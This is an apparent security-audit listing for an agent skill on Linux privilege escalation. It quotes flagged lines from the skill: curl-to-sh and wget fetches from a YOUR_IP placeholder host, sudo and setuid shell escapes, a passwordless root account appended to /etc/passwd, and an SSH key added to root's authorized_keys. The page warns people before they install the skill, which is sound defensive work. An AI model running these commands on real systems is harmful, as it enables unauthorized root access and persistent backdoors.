privilege-escalation-knowledge
Provides comprehensive methodologies for Linux privilege escalation, covering enumeration and exploitation techniques for security professionals.
Security score
The privilege-escalation-knowledge skill was audited on Mar 1, 2026 and we found 34 security issues across 4 threat categories, including 1 critical. Review the findings below before installing.
Categories Tested
Security Issues
Direct command execution function call
| 151 | # - python: sudo python -c 'import pty;pty.spawn("/bin/bash")' |
Piping content to sh shell
| 132 | curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh |
System command execution
| 149 | # - awk: sudo awk 'BEGIN {system("/bin/sh")}' |
System command execution
| 181 | /usr/bin/python -c 'import os; os.setuid(0); os.system("/bin/sh")' |
System command execution
| 203 | /usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' |
Python os.system command execution
| 181 | /usr/bin/python -c 'import os; os.setuid(0); os.system("/bin/sh")' |
Python os.system command execution
| 203 | /usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' |
Curl to non-GitHub URL
| 117 | curl http://YOUR_IP:8000/linpeas.sh -o linpeas.sh |
Wget to non-GitHub URL
| 115 | wget http://YOUR_IP:8000/linpeas.sh |
Wget to non-GitHub URL
| 278 | wget http://YOUR_IP:8000/dirtypipe.c |
Access to /etc/passwd
| 209 | ### 4. Writable /etc/passwd |
Access to /etc/passwd
| 212 | # Check if /etc/passwd is writable |
Access to /etc/passwd
| 213 | ls -la /etc/passwd |
Access to /etc/passwd
| 216 | echo 'hacker:$6$salt$hashedpassword:0:0:root:/root:/bin/bash' >> /etc/passwd |
Access to /etc/passwd
| 219 | echo 'hacker::0:0:root:/root:/bin/bash' >> /etc/passwd |
Access to /etc/passwd
| 465 | ls -la /etc/shadow /etc/passwd |
Access to /etc/shadow
| 465 | ls -la /etc/shadow /etc/passwd |
Access to hidden dotfiles in home directory
| 310 | cat ~/.bash_history |
Access to root home directory
| 92 | ls -la /root/ |
Access to root home directory
| 380 | mkdir -p /root/.ssh |
Access to root home directory
| 381 | echo 'YOUR_PUBLIC_KEY' >> /root/.ssh/authorized_keys |
Access to root home directory
| 382 | chmod 600 /root/.ssh/authorized_keys |
Access to root home directory
| 391 | cat /root/root.txt |
Access to root home directory
| 392 | cat /root/flag.txt |
Access to root home directory
| 403 | cat /root/root.txt | wc -c # Should be 33 (32 + newline) |
Access to root home directory
| 404 | cat /root/root.txt | grep -E '^[a-f0-9]{32}$' |
Access to root home directory
| 411 | ROOT_FLAG=$(cat /root/root.txt) |
Access to root home directory
| 547 | # cat /root/root.txt |
Access to SSH directory
| 381 | echo 'YOUR_PUBLIC_KEY' >> /root/.ssh/authorized_keys |
Access to SSH directory
| 382 | chmod 600 /root/.ssh/authorized_keys |
External URL reference
| 67 | - GTFOBins (https://gtfobins.github.io/) - SUID/sudo exploitation |
External URL reference
| 115 | wget http://YOUR_IP:8000/linpeas.sh |
External URL reference
| 117 | curl http://YOUR_IP:8000/linpeas.sh -o linpeas.sh |
External URL reference
| 278 | wget http://YOUR_IP:8000/dirtypipe.c |